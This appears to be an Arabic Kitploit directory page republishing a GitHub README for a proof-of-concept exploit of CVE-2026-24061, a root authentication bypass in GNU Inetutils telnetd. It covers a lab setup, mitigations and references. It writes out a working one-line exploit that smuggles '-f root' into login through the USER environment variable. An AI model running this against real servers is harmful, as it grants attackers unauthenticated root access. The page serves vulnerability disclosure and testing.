Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-24061 — GNU Inetutils telnetd تجاوز المصادقة عن بُعد | Kitploit
أدوات/GitHubGitHub/midox008/cve-2026-24061
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعد
GitHubmidox008/cve-2026-24061

CVE-2026-24061

GNU Inetutils telnetd تجاوز المصادقة عن بُعد

عرض المستودع
54منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-24061

GNU Inetutils telnetd تجاوز المصادقة عن بُعد

بجدية، telnet في 2026؟ هيا يا جماعة، حان وقت التقدم. SSH موجود منذ 1995. 🤦

الوصف

ثغرة حرجة في تجاوز المصادقة في GNU Inetutils telnetd تؤثر على الإصدارات من 1.9.3 حتى 2.7.

تستغل الثغرة خيار telnet NEW-ENVIRON لحقن وسائط خبيثة في login(1). من خلال تعيين USER=-f root عبر بروتوكول telnet، يمكن للمهاجم تجاوز المصادقة والحصول على صلاحيات root بدون بيانات اعتماد.

الإصدارات المتأثرة

  • GNU Inetutils 1.9.3 - 2.7

التفاصيل التقنية

يدعم بروتوكول telnet خيار NEW-ENVIRON (RFC 1572) الذي يسمح للعميل بإرسال متغيرات البيئة إلى الخادم. يقوم خادم telnetd بتمرير متغير USER إلى login(1) كوسيط.

من خلال إرسال USER=-f root، يتم تفسير القيمة على النحو التالي:

  • علامة -f: تخطي المصادقة (مضيف موثوق)
  • root: المستخدم المستهدف

يؤدي هذا إلى تنفيذ login -f root، مما يمنح وصولاً فوريًا بصلاحيات root.

يكتشف PoC نجاح الاستغلال عن طريق التحقق من IAC WILL ECHO (0xff 0xfb 0x01) - إشارة البروتوكول التي يرسلها الخادم عند منح الوصول إلى الصدفة.

إعداد المختبر

root@kitploit:~
# بناء وتشغيل حاوية telnetd الضعيفة
docker compose up --build -d

# اختبار الاستغلال
go run poc.go 127.0.0.1 2323

الاستغلال

root@kitploit:~
# باستخدام PoC بلغة Go (مع صدفة تفاعلية)
go run poc.go <target> <port>

# PoC بسيط باستخدام عميل telnet القياسي
env USER='-f root' telnet -a <target> <port>

التخفيف

  • توقف عن استخدام telnet في 2026، بجدية 🙏
  • استخدم SSH بدلاً منه (موجود منذ 31 عامًا الآن، لم أكن قد وُلدت حتى في '95 lol)
  • قم بالترقية إلى إصدار مصحح من GNU Inetutils
  • قيّد الوصول إلى telnet عبر قواعد جدار الحماية

الملفات

  • poc.go - استغلال Go مع صدفة تفاعلية
  • Dockerfile - حاوية telnetd الضعيفة
  • docker-compose.yml - تنسيق المختبر

المراجع

  • الاستشارة: https://www.openwall.com/lists/oss-security/2026/01/20/2
  • GNU Inetutils: https://www.gnu.org/software/inetutils/
  • RFC 1572 (NEW-ENVIRON): https://tools.ietf.org/html/rfc1572

الاعتمادات

  • فريق أبحاث LeakIX
تنزيل الأداة